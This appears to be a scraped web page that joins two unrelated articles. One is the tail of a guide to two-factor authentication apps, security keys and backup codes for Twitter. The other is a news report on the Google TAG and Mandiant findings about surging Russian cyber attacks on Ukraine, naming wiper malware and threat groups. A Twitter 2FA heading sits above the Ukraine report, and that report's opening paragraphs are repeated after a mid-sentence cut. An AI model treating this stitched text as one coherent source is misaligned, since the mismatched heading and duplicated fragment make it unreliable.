There are multiple, free two-factor authentication apps to pick from, although they all offer the same essential service and can be used across platforms. The big players have their own apps:There’s Google’s Authenticator App and Microsoft Authenticator. Alternatively, various password managers that you may already use, such as 1Password, have their own authenticator services. There’s also Twilio’s Authy App. And if you have an iPhone, you can use Apple’s built-in generator. 

Each has pros and cons that you should consider before picking one. For instance, you may be heavily locked into Microsoft’s or Google’s ecosystems and want to use their apps. Google’s is relatively basic but doesn’t sync elsewhere; Microsoft’s app offers password management services. However, the Microsoft and Authy apps appear to collect more user analytics data than Google’s. Whatever app you pick, it’s possible to switch to another authenticator.

Setting up an authentication app on Twitter, and anywhere else, is simple. For Twitter, you need to visit its 2FA page. Then open your authentication app, select the option to add a new account, then scan the QR Twitter shows you. Enter the six-digit code on your app and you’re done.

Alternatively, instead of an authenticator app, you can use a security key. The keys are physical pieces of hardware that you either plug into your computer when logging in or connect to your phone. They’re the most secure method of 2FA as an attacker physically needs the key to log in to your account—whereas an attacker always has the possibility of trying to trick you into handing over a generated six-digit authentication code.

Once you’ve set up an authenticator app or hardware key for Twitter, you’ll also want to make a note of Twitter’s backup code for your account. The backup code can be used to log in to Twitter if you can’t access your 2FA options, such as losing your phone or security key. (The first time you set up 2FA on Twitter it will provide you with a backup code, although this can be regenerated online.) You should save this in a safe place, such as your password manager.

How to Protect Yourself from Twitter’s 2FA Crackdown

Russia's cyber attacks against Ukraine surged by 250% in 2022 when compared to two years ago, Google's Threat Analysis Group (TAG) and Mandiant disclosed in a new joint report.
The targeting, which coincided and has since persisted following the country's military invasion of Ukraine in February 2022, focused heavily on the Ukrainian government and military entities, alongside critical

Russia's cyber attacks against Ukraine surged by 250% in 2022 when compared to two years ago, Google's Threat Analysis Group (TAG) and Mandiant disclosed in a new joint report.

The targeting, which coincided and has since persisted following the country's military invasion of Ukraine in February 2022, focused heavily on the Ukrainian government and military entities, alongside critical infrastructure, utilities, public services, and media sectors.

Mandiant said it observed, "more destructive cyber attacks in Ukraine during the first four months of 2022 than in the previous eight years with attacks peaking around the start of the invasion."

As many as six unique wiper strains – including WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, Industroyer2, and SDelete – have been deployed against Ukrainian networks, suggesting a willingness on the part of Russian threat actors to forgo persistent access.

Phishing attacks aimed at NATO countries witnessed a 300% spike over the course of the same period. These efforts were driven by a Belarusian government-backed group dubbed PUSHCHA (aka Ghostwriter or UNC1151) that's aligned with Russia.

"Russian government-backed attackers have engaged in an aggressive, multi-pronged effort to gain a decisive wartime advantage in cyberspace, often with mixed results," TAG's Shane Huntley noted.

Some of the key actors involved in the efforts include FROZENBARENTS (aka Sandworm or Voodoo Bear), FROZENLAKE (aka APT28 or Fancy Bear), COLDRIVER (aka Callisto Group), FROZENVISTA (aka DEV-0586 or UNC2589), and SUMMIT (aka Turla or Venomous Bear).

The uptick in the intensity and frequency of the operations aside, the invasion has also been accompanied by the Kremlin engaging in covert and overt information operations designed to shape public perception with the goal of undermining the Ukrainian government, fracturing international support for Ukraine, and maintain domestic support for Russia.

"GRU-sponsored actors have used their access to steal sensitive information and release it to the public to further a narrative, or use that same access to conduct destructive cyber attacks or information operations campaigns," the tech giant said.

With the war splintering hacking groups over political allegiances, and in some cases, even causing them to close shop, the development further points to a "notable shift in the Eastern European cybercriminal ecosystem" in a manner that blurs the lines between financially motivated actors and state-sponsored attackers.

This is evidenced by the fact that UAC-0098, a threat actor that has historically delivered the IcedID malware, was observed repurposing its techniques to assault Ukraine as part of a set of ransomware attacks.

Some members of UAC-0098 are assessed to be former members of the now-defunct Conti cybercrime group. TrickBot, which was absorbed into the Conti operation last year prior to the latter's shutdown, has also resorted to systematically targeting Ukraine.

It's not just Russia, as the ongoing conflict has led Chinese government-backed attackers such as CURIOUS GORGE (aka UNC3742) and BASIN (aka Mustang Panda) to shift their focus towards Ukrainian and Western European targets for intelligence gathering.

"It is clear cyber will continue to play an integral role in future armed conflict, supplementing traditional forms of warfare," Huntley said.

The disclosure comes as the Computer Emergency Response Team of Ukraine (CERT-UA) warned of phishing emails targeting organizations and institutions that purport to be critical security updates but actually contain executables that lead to the deployment of remote desktop control software on the infected systems.

CERT-UA attributed the operation to a threat actor it tracks under the moniker UAC-0096, which was previously detected adopting the same modus operandi back in late January 2022 in the weeks leading to the war.

"A year after Russia launched its full-scale invasion of Ukraine, Russia remains unsuccessful in bringing Ukraine under its control as it struggles to overcome months of compounding strategic and tactical failures," cybersecurity firm Recorded Future said in a report published this month.

"Despite Russia's conventional military setbacks and its failure to substantively advance its agenda through cyber operations, Russia maintains its intent to bring Ukraine under Russian control," it added, while also highlighting its "burgeoning military cooperation with Iran and North Korea."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google